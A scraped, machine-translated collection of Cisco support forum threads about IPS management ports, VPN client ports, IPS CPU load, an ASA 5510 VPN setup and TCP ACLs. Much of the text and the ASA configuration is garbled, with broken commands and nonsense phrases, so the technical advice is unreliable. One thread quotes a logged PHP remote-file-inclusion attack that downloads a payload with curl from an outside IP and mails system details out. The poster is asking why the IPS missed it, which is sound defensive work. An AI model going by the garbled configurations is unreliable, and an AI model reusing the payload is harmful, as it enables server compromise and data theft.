TCP ports used by Cisco IPS

I looked up and down by Google and cisco.com for the answer to this, but can do not seem to find it documented anywhere.  I'm looking to identify all the ports that are required to manage a Cisco IPS so that I can open the firewall.  I understand that the following ports are necessary, but I don't know if I am missing anything, please see below:

TCP 22: Source-online sensor Admin

TCP 443: Source-online sensor Admin

UDP 123: Sensor-online NTP Server Admin

Am I missing something?  Thank you!

Jonathan

Boulder, Co

Jonathon;

If you do use automatic signatures updates and updates overall correlation, you must also enable the IPS management IP address access TCP 80 (signature and updates to GC) and UDP 53 (updates of the GC).

Scott

Tags: Cisco Security

Similar Questions

  • Use of TCP Port when adding sensors to virtual machines

    What port TCP VMS use when adding a sensor to VMS security monitor, etc. Device Manager?

    RDEF listener uses port?

    Port UDP 45000 remained in IDS4.x or is it only required in ID 3 x?

    Thank you.

    A listener RDEP, if I understand the context of your question, is the process on the ID device that is connected to by customers RDEP (VEI, CTR, VMS / IDSMC). Since this is a server process, he listens to TCP 443. It can be configured to listen on TCP 80, but it is not a default setting.

    The only other default port used by Cisco IDS 4.x is TCP 22 (SSH) to access the CLI and some file copy operations (scp, for example). Again, you can configure the use of TCP 23 (TELNET) to access CLI, but is not a default setting.

    In summary, a device (IDS-42XX, JOINT-2, NM-CIDS) will have only two ports open by default. 22 TCP and 443. 22 TCP is used by SSH for CLI access and TCP 443 is used to access RDEP and IDM.

    Finally, UDP 45000 is not used by Cisco IDS 4.x; It was only used in 3.x and more for the former communication protocol.

    I hope this helps.

    Alex Arndt

  • What are the ports used by the Cisco VPN Client?

    Hello

    I need to open my outgoing traffic on my firewall to allow two interns (LAN) Cisco VPN Client to connect to their Internet virtual private network.

    I already opened the port 500/UDP, but they are not able to connect. If I open all outgoing ports, they can connect.

    What are the ports used by the Cisco VPN Client?

    Thank you

    You need to open:

    UDP 500

    ESP protocol

    You must also open the UDP 4500 port (if using NAT - T).

    In addition, if the clients are connecting to a VPN 3000 Concentrator series and it is configured for all other options of NAT-transparency, corresponding ports must be open. By default:

    1. If using IPSec over TCP 10000, then open TCP 10000.

    2. If using IPSec over UDP 10000, open UDP 1000.

  • use of 100% of Cisco ips 4270 cpu...

    Hi people I have cisco ips 4270 version 7.0 (2) E3 when I try to access through IDM his show the cpu1 CPU = 100% and 100% = cpu4, but vary cpu1 and cpu2 can you please tell me what will be the solution to this problem...

    When I try to go to the configuration then its give me error... attached document attached please check...

    Hello

    Having 100% on some of your CPU is normal on the platform of the IPS.

    The device uses cycles slowed down it is to prepare for the handling of incoming packets and reduce the delay that it will introduce on their way, then is expected to get even under low load.

    If you want to get a better idea of capacity by % of your IPS you are currently using, you should have a look at the value of the load of the Inspection. Looking at the data that you have provided, you are about 25% at present.

    For the message timeout rdep, it seems to be a software problem. Looking more closely at the image you attached, you can also see "analysis engine status: no answer.

    It is somewhat difficult to troubleshoot those on CSC, so I suggest to prosecute TAC if you want to know the exact origin of cause.

    What I advise is upgraded to the latest code of 7 (0) which is I believe 7.0 E4 (5A), since it is more then likely fixed in this version.

    If you are looking for a quick fix, a reboot of the PPE must erase this but the problem will more then likely return later.

    Kind regards

    Nicolas

  • How to use Layer 2 Ports on the Cisco 1841 router switch

    Hello

    I use the Cisco 1841 router with a single port layer 3 Fe0 and 8 Ports switched.

    I gave the IP on the Fe0 port which is connected to another router.

    Now I don't know how to use Layer 2 of the router switch ports.

    I tried to make one of the port as a Port of access by switchport mode access and connected my laptop and the same subnet given IP, but I can't ping my Fe0 IP port and vice versa, as I am also unable to ping my laptop router.

    Can someone explain to me how to use these ports on layer 2?

    Hi Muhammadatifmasood, take a look at the link below, I'm sure that you will find it useful.

    https://supportforums.Cisco.com/discussion/10919631/how-enable-routing-b...

    BenSamayoa

  • Which TCP port is used for VMWare Infrastructure Client?

    Hello, my ESXi server sits on the private network, and I'm trying to PAT so that I can access the external network using VMWare Infrastructure Client Server. Does anyone know what port is VMWare Infrastructure Client listen? Thank you.

    Priscilla

    Do the external network for VMware NAT

    I guess you mean that your server is located in the internal network and Client is on the outside.

    If the customer does not have to "listen" for connections it opens TCP ports - HI 1024-65535 to servers as follows.

    Servers (including GSX) TCP ports: 8222, 8333, 902

    If you have ESX (i) then TCP ports: 80, 443, 902

    T:OMI

    Psalm Points, please

  • Setup for use with Cisco Anyconnect VPN IPsec

    So, I had trouble setting up VPN on our ASA 5510. I would use IPsec VPN so that we don't have to worry about licensing issues, but what I have read you can do with and always use Cisco Anyconnect. My knowledge on how to set up VPN especially in iOS version 8.4 is limited, so I've been using a combination of command line and ASDM.

    I am finally able to connect from a remote location, but once I log in, nothing else works. What I've read, you can use IPsec for client-to-lan connections. I use a pre-shared for this. Documentation is limited on what should happen after have connected you? Shouldn't be able to local access on the vpn connection computers? I'm trying to implement work. If I have VPN from home, should not be able to access all of the resources at work? According to me, because I used the command-line as ASDM I confused some of the configuration. In addition, I think that some of the default policies are confused me too. So I probably need a lot of help. Here is my current setup with the changed IP address and other things that are not related to deleted VPN.

    NOTE: We are still testing this ASA and is not in production.

    Any help you can give me is greatly appreciated.

    ASA Version 8.4 (2)

    !

    ASA host name

    domain.com domain name

    !

    interface Ethernet0/0

    nameif inside

    security-level 100

    the IP 192.168.0.1 255.255.255.0

    !

    interface Ethernet0/1

    nameif outside

    security-level 0

    IP 50.1.1.225 255.255.255.0

    !

    interface Ethernet0/2

    Shutdown

    No nameif

    no level of security

    no ip address

    !

    interface Ethernet0/3

    Shutdown

    No nameif

    no level of security

    no ip address

    !

    interface Management0/0

    No nameif

    security-level 100

    IP 192.168.1.1 255.255.255.0

    !

    boot system Disk0: / asa842 - k8.bin

    passive FTP mode

    DNS domain-lookup outside

    DNS server-group DefaultDNS

    !

    permit same-security-traffic intra-interface

    !

    network of the NETWORK_OBJ_192.168.0.224_27 object

    subnet 192.168.0.224 255.255.255.224

    !

    object-group service VPN

    ESP service object

    the purpose of the tcp destination eq ssh service

    the purpose of the tcp destination eq https service

    the purpose of the service udp destination eq 443

    the destination eq isakmp udp service object

    !

    allowed IP extended ip access list a whole

    !

    mask 192.168.0.225 - 192.168.0.250 255.255.255.0 IP local pool VPNPool

    no failover

    failover time-out period - 1

    ICMP unreachable rate-limit 1 burst-size 1

    ASDM image disk0: / asdm - 645.bin

    don't allow no asdm history

    ARP timeout 14400

    NAT (inside, outside) static source any any static destination NETWORK_OBJ_192.168.0.224_27 NETWORK_OBJ_192.168.0.224_27 non-proxy-arp-search to itinerary

    !

    the object of the LAN network

    NAT dynamic interface (indoor, outdoor)

    Access-group outside_in in external interface

    Route outside 0.0.0.0 0.0.0.0 50.1.1.250 1

    Sysopt noproxyarp inside

    Sysopt noproxyarp outdoors

    Crypto ipsec transform-set ikev1 SHA-ESP-3DES esp-3des esp-sha-hmac

    Crypto ipsec transform-set ikev1 ESP-AES-256-MD5 esp-aes-256 esp-md5-hmac

    Crypto ipsec transform-set ikev1 ESP-DES-SHA esp - esp-sha-hmac

    Crypto ipsec transform-set ikev1 esp ESP-DES-MD5-esp-md5-hmac

    Crypto ipsec transform-set ikev1 ESP-AES-192-MD5 esp-aes-192 esp-md5-hmac

    Crypto ipsec transform-set ikev1 ESP-3DES-MD5-esp-3des esp-md5-hmac

    Crypto ipsec transform-set ikev1 ESP-AES-256-SHA esp-aes-256 esp-sha-hmac

    Crypto ipsec transform-set ikev1 ESP-AES-128-SHA aes - esp esp-sha-hmac

    Crypto ipsec transform-set ikev1 ESP-AES-192-SHA esp-aes-192 esp-sha-hmac

    Crypto ipsec transform-set ikev1 ESP-AES-128-MD5-esp - aes esp-md5-hmac

    Crypto ipsec ikev2 ipsec-proposal OF

    encryption protocol esp

    Esp integrity sha - 1, md5 Protocol

    Crypto ipsec ikev2 proposal ipsec 3DES

    Esp 3des encryption protocol

    Esp integrity sha - 1, md5 Protocol

    Crypto ipsec ikev2 ipsec-proposal AES

    Esp aes encryption protocol

    Esp integrity sha - 1, md5 Protocol

    Crypto ipsec ikev2 ipsec-proposal AES192

    Protocol esp encryption aes-192

    Esp integrity sha - 1, md5 Protocol

    Crypto ipsec ikev2 AES256 ipsec-proposal

    Protocol esp encryption aes-256

    Esp integrity sha - 1, md5 Protocol

    crypto dynamic-map SYSTEM_DEFAULT_CRYPTO_MAP 65535 pfs Group1 set

    crypto dynamic-map SYSTEM_DEFAULT_CRYPTO_MAP 65535 define ikev1 transform-set ESP-AES-128-SHA ESP-AES-128-MD5 ESP-AES-192-SHA ESP-AES-192-MD5 ESP-AES-256-SHA ESP-AES-256-MD5 ESP-3DES-SHA MD5-ESP-3DES ESP-DES-SHA ESP-DES-MD5

    crypto dynamic-map SYSTEM_DEFAULT_CRYPTO_MAP 65535 define ikev2 AES256 AES192 AES 3DES ipsec-proposal OF

    outside_map card crypto 65535-isakmp dynamic ipsec SYSTEM_DEFAULT_CRYPTO_MAP

    outside_map interface card crypto outside

    Crypto ca trustpoint ASDM_TrustPoint0

    registration auto

    name of the object CN = ASA

    Configure CRL

    crypto ca server

    Shutdown

    string encryption ca ASDM_TrustPoint0 certificates

    certificate d2c18c4e

    864886f7 0d06092a c18c4e30 308201f3 3082015c a0030201 d 020204 2 0d 010105

    0500303e 3110300e 06035504 03130741 53413535 3130312a 2 a 864886 30280609

    02161b 41 53413535 31302e64 69676974 616c 6578 7472656d 65732e63 f70d0109

    3131 31303036 31393133 31365a 17 323131 30303331 39313331 0d 170d 6f6d301e

    365a303e 3110300e 06035504 03130741 53413535 3130312a 2 a 864886 30280609

    02161b 41 53413535 31302e64 69676974 616c 6578 7472656d 65732e63 f70d0109

    6f6d3081 9f300d06 092 has 8648 86f70d01 01010500 03818d b 30818902-00-818100-2

    8acbe1f4 5aa19dc5 d3379bf0 f0e1177d 79b2b7cf cc6b4623 d1d97d4c 53c9643b

    37f32caf b13b5205 d24457f2 b5d674cb 399f86d0 e6c3335f 031d54f4 d6ca246c

    234b32b2 b3ad2bf6 e3f824c0 95bada06 f5173ad2 329c28f8 20daaccf 04c 51782

    3ca319d0 d5d415ca 36a9eaff f9a7cf9c f7d5e6cc 5f7a3412 98e71de8 37150f02

    03010001 300 d 0609 2a 864886 f70d0101 05050003 8181009d d2d4228d 381112a 1

    cfd05ec1 0f51a828 0748172e 3ff7b480 26c197f5 fd07dd49 01cd9db6 9152c4dc

    18d0f452 50f5d0f5 4a8279c4 4c1505f9 f5e691cc 59173dd1 7b86de4f 4e804ac6

    beb342d1 f2db1d1f 878bb086 981536cf f4094dbf 36c5371f e1a0db0a 75685bef

    af72e31f a1c4a892 d0acc618 888b53d1 9b 888669 70e398

    quit smoking

    IKEv2 crypto policy 1

    aes-256 encryption

    integrity sha

    Group 2 of 5

    FRP sha

    second life 86400

    IKEv2 crypto policy 10

    aes-192 encryption

    integrity sha

    Group 2 of 5

    FRP sha

    second life 86400

    IKEv2 crypto policy 20

    aes encryption

    integrity sha

    Group 2 of 5

    FRP sha

    second life 86400

    IKEv2 crypto policy 30

    3des encryption

    integrity sha

    Group 2 of 5

    FRP sha

    second life 86400

    IKEv2 crypto policy 40

    the Encryption

    integrity sha

    Group 2 of 5

    FRP sha

    second life 86400

    Crypto ikev2 activate out of service the customer port 443

    Crypto ikev2 access remote trustpoint ASDM_TrustPoint0

    Crypto ikev1 allow outside

    IKEv1 crypto policy 10

    preshared authentication

    3des encryption

    sha hash

    Group 2

    life 86400

    IKEv1 crypto policy 65535

    preshared authentication

    3des encryption

    sha hash

    Group 2

    life 86400

    Telnet timeout 5

    SSH timeout 10

    Console timeout 0

    management-access inside

    SSL-trust outside ASDM_TrustPoint0 point

    WebVPN

    allow outside

    AnyConnect image disk0:/anyconnect-win-2.5.2014-k9.pkg 1

    AnyConnect image disk0:/anyconnect-linux-2.5.2014-k9.pkg 2

    AnyConnect image disk0:/anyconnect-macosx-i386-2.5.2014-k9.pkg 3

    profiles of AnyConnect VPN disk0: / devpn.xml

    AnyConnect enable

    tunnel-group-list activate

    internal VPN group policy

    attributes of VPN group policy

    value of server WINS 50.1.1.17 50.1.1.18

    value of 50.1.1.17 DNS server 50.1.1.18

    Ikev1 VPN-tunnel-Protocol, l2tp ipsec ikev2 ssl-client

    digitalextremes.com value by default-field

    WebVPN

    value of AnyConnect VPN type user profiles

    always-on-vpn-profile setting

    privilege of xxxxxxxxx encrypted password username administrator 15

    VPN1 xxxxxxxxx encrypted password username

    VPN Tunnel-group type remote access

    General-attributes of VPN Tunnel-group

    address (inside) VPNPool pool

    address pool VPNPool

    LOCAL authority-server-group

    Group Policy - by default-VPN

    VPN Tunnel-group webvpn-attributes

    enable VPN group-alias

    Group-tunnel VPN ipsec-attributes

    IKEv1 pre-shared-key *.

    !

    class-map inspection_default

    match default-inspection-traffic

    class-map ips

    corresponds to the IP access list

    !

    !

    type of policy-card inspect dns preset_dns_map

    parameters

    maximum message length automatic of customer

    message-length maximum 512

    Policy-map global_policy

    class inspection_default

    inspect the preset_dns_map dns

    inspect the ftp

    inspect h323 h225

    inspect the h323 ras

    Review the ip options

    inspect the netbios

    inspect the rsh

    inspect the rtsp

    inspect the skinny

    inspect esmtp

    inspect sqlnet

    inspect sunrpc

    inspect the tftp

    inspect the sip

    inspect xdmcp

    inspect the http

    class ips

    IPS inline help

    class class by default

    Statistical accounting of user

    I would recommend buy AnyConnect Essentials. The cost of the license is nominal - list of US $150 for the 5510. (piece number L-ASA-AC-E-5510 =)

    Meawwhile you can use the Cisco VPN client inherited with IKEv1 IPSec remote access VPN using profiles *.pcf.

    I believe you can also use the client Anyconnect client SSL or DTLS transport access remotely (non-IPsec) without having to buy the license Anyconnect Essentials for your ASA focus.

    As an aside, note that if you want to use AnyConnect Mobile (e.g. for iPhone, iPad, Android, Blackberry etc.clients) you will also get the additional license for it (L-ASA-AC-M-5510 =, also price US $150)

  • ACL tcp port filter

    Dear experts,

    I study the ACL to (stop) the tcp port filter at the bottom of the URL

    http://www.Cisco.com/en/us/Tech/tk648/tk361/technologies_configuration_example09186a0080100548.shtml

    In the section of "allow only internal networks to initiate a TCP Session ', grateful if someone could enlighten me the use of the 'established '.

    interface ethernet0 ip access-group 102 in ! access-list 102 permit tcp any any gt 1023 established

    What is different if the ACL is changed as a result of:

    access-list 102 permit tcp any any gt 1023

    RDG

    Both your ACL suggested 101 and 145 are quite correct.

    ACL 105: Note should say, allow traffic back on tcp/80, with the source port greater than 1023. The rest of your comment is correct.

    ACL 115: Note should say allow all traffic with a source port of HTTP (TCP/80) and destination port above 1023.

    ACL 125: Note should say allow all the return of traffic with a source port of HTTP (TCP/80). And Yes, you are right, it also includes the ACL 105 function.

    ACL 135: Note should say allow all traffic with a source port of HTTP (TCP/80). And Yes, you are right, it also includes the ACL 115 function.

  • Open the TCP Port

    I'm trying to implement a TCP port to listen to music on my home network through JRiver. The server and work remotely on my home network. But I want to access on the network side.

    I use ATT Uverse to access the internet. I disabled wireless and ATT modem to transmit to my Airport Extreme.

    I have these instructions to configure the port:

    1. Open AirPort Utility and change your AirPort Extreme or AirPort Express. Select the tab network (image). Select the sign of closer Port settings box. The Type of Firewall entry should be IPv4 Port Mapping. Enter a description like JRiver Media Center. Enter the Public 52199 TCP Port. Enter the private IP address, it's the IP address of your JRiver Media Center PC at home. Enter the TCP Port private 52199. Click on save, and then click Update. (image)

    When coming to this page, however, the firewall main entry box Type "IPv6" entered and grayed out, so it cannot be changed.

    Any help would be greatly appreciated.

    Sorry, but no image is available.

    However, to start, running the AirPort Utility > select the AirPort Extreme > change > Internet tab > Internet Options...

    What is the value to configure IPv6? If it is 'Automatically', change it to "Link-local." only (Note: I'm assuming that your ISP DO provide you IPv6 service still.)

  • enable outbound access to TCP ports

    would figure out how to open the outbound for TCP ports access and allow outgoing TCP access to certain ports? I know where to add a port. Put the name of am I let pass like Second Life?

    Hello Angela12,

    What operating system is installed on your computer?

    This can be useful for you:

    http://Windows.Microsoft.com/en-us/Windows7/open-a-port-in-Windows-Firewall

    Kind regards

    Savan - Microsoft technical support.

  • What port uses the part of the back-slash?

    I have a VPN connection and try to \\computername\c$

    Anyone know which ports the------uses hand admin?

    Thanks in advance.

    Windows network uses NetBIOS over TCP/IP (NetBT) Protocol.
    This protocol uses the following ports:

    Port UDP 137
    Port UDP 138
    139 TCP port

    See:
    "Windows NT, Terminal Server, and Microsoft Exchange Services Use TCP/IP Ports".
      <>http://support.Microsoft.com/kb/150543/en-U S >

    Of course, these protocols are probably by tunnel through your VPN port.

    HTH,
    JW

  • Windows Server 2008 R2, driver HP 7410 AIO, TCP Port printing

    I just finished a new installation of Windows Server 2008 R2 64 bit on my computer that was previously using Windows Server 2008 64 bit and can't set up access to the network at my AIO 7410 printer. I would use the most recent driver Windows 7 64 bit (AIO_CDB_FSW_Full_Win_WW_130_141.exe), but the installation of the driver complains "this type of product does not have the list of the types of supported products. My first question is a driver Windows 2008 R2 64-bit will be available soon since none are currently provided?

    The way, I have Vista (AIO_CDB_Full_Network_enu_NB.exe) that does not detect the printer (192.168.1.100) of the computer (192.168.1.2) if I get the installation to complete using the USB option then try the last driver. Once done, I try to change the properties of the printer to change the used "USB001" port - virtual printer to USB port to a TCP port. However, when I click on the "add a Port" and choose "Standard TCP/IP Port" I get a dialog with a title "Add Printer Ports" and the error message "cannot add port specified. Access is denied. »

    Has anyone solved what is the root cause of this error? I am an administrator on the PC and have never seen this before curve ball.

    I should add that a test page print correctly via the USB cable and another Vista PC on the network continues to access the printer through the network so that the printer works fine.

    Thanks in advance!

    Google is my friend! Found this thread: http://forums.techguy.org/windows-vista/541278-solved-access-denied-network-printers.html that helped.

    The main steps are to create a new local printer, select the TCP port and provide the IP address of the printer. Windows query the printer and will automatically detect the HP 7410 driver is already installed and ask if it should use this driver I have answered Yes to. You should see a second printer now available in the control panel which is probably selected as the default printer. I unplugged the USB cable, print a test page using the new TCP profile and it works beautifully.

    I wish it was not so difficult to switch from a USB port to a TCP port, but I'm happy to have found a work around.

    I hope that this avoids some of the pain of losing a darker night of their lives thanks to the peculiarities of Windows!

  • Upgrade version of CISCO IPS signature

    Hi guys:

    Anyone know the process for updating the signature on a CISCO IPS version, I want to do it manually. If somedoy can tell me the orders and all I have to do this.

    Concerning

    Luis;

    Updats manual signature for Cisco IPS sensors can be performed from the CLI as shown here:

    http://www.Cisco.com/en/us/docs/security/IPS/7.0/Configuration/Guide/CLI/cli_system_images.html#wp1142504

    Or from the interface of the IDM as shown here:

    http://www.Cisco.com/en/us/docs/security/IPS/7.0/Configuration/Guide/IDM/idm_sensor_management.html#wp2126670

    This process is also used to upgrade software base of the probe.

    Scott

  • List of Cisco IPS Signatures

    Hi guys,.

    I need list of PDF complete cisco ips signatures.

    Can someone help me find a link or a pdf?

    Thank you all,

    JV

    Hello

    I couldn't find any method to export the list of signatures. This could be because there are thousands of them.

    However, you can use the following link to find signatures of details.

    http://Tools.Cisco.com/Security/Center/home.x

    SPSP

  • PHP exploit triggers Cisco Security Agent but NOT at Cisco IPS... why?

    Does anyone know what signing this feat should trigger with the Cisco IPS sensor? You are not sure if there is one, or if we turned it off?

    We see this feat hit our Exchange servers several times during the week.

    The process of "C:\WINNT\System32\inetsrv\inetinfo.exe" (as user NT AUTHORITY\SYSTEM) received the data ' / index2.php? option = com_content & do_pdf = 1 & id = 1index2.php? _REQUEST [option] = com_content & _REQUEST [Itemid] = 1 & GLOBALS = & mosConfig_absolute_path =http://220.194.57.112/~photo/cm?&cmd=cd%20cache;curl%20-O%20http: / / 220.194.57.112/~photo/cm;mv%20cm%20index.php;rm%20-rf%20cm*;uname%20-a%20|%20mail%20-s%20uname_i2_66. 224.194.188%[email protected] / * /; uname%20-a%20|%20Mail%20-s%20uname_i2_66.224.194.188%[email protected] / * /. com; echo |'.

    I think that this could be the exploit of mambo. See http://www.securityfocus.com/archive/1/archive/1/427196/100/0/threaded for the info. I searched on mambo MySDN and found GIS 5163 "Mambo Site Server Administration Password ByPass" here is a snippet of the description: "administrative access is acquired by sending a specific url using the index2.php script and the PHPSESSID variable." This looks like what you pasted. Note "index2.php". Your IPS can not seen this so it was more than 443.

    Hope this helps

    M

Maybe you are looking for

  • shortcut key Ctrl-f does not open the search bar

    nor is the option "find" in the edition of the menu drop down. Overlay on the screen immediately open the toolbar and it works properly. I've noticed this for several versions on Win 7.

  • Wait for the sedentary Timeout

    If wait until what the sedentary function must timeout because the monitored signal does not within the limits specified in the deadline, which is an indication that the function actually expired?  He stops running, the movie file or throw an error a

  • How to recover windows Vista theme

    It was lost after that anyone can install or remove a utility program help?

  • Photosmart 5520 - changing levels of gray, color

    I was wondering if there is an easier way to quickly change from grayscale to color.  With my old HP printer, I had only to click twice to change color, but on this new I have to click several times, preferences-advanced-disable grayscale.  Most of o

  • Phone of blackBerry Smartphones oscillates between 3 G/EDGE &amp; GPRS

    Hiya At my 9105 for a few weeks now & get it configured to use my WiFi when I'm at home. However, when I'm not home, the light thing internet keeps fluctuating between 3 G/EDGE & GPRS. Is it just because I'm in a low signal area?  I usually always ha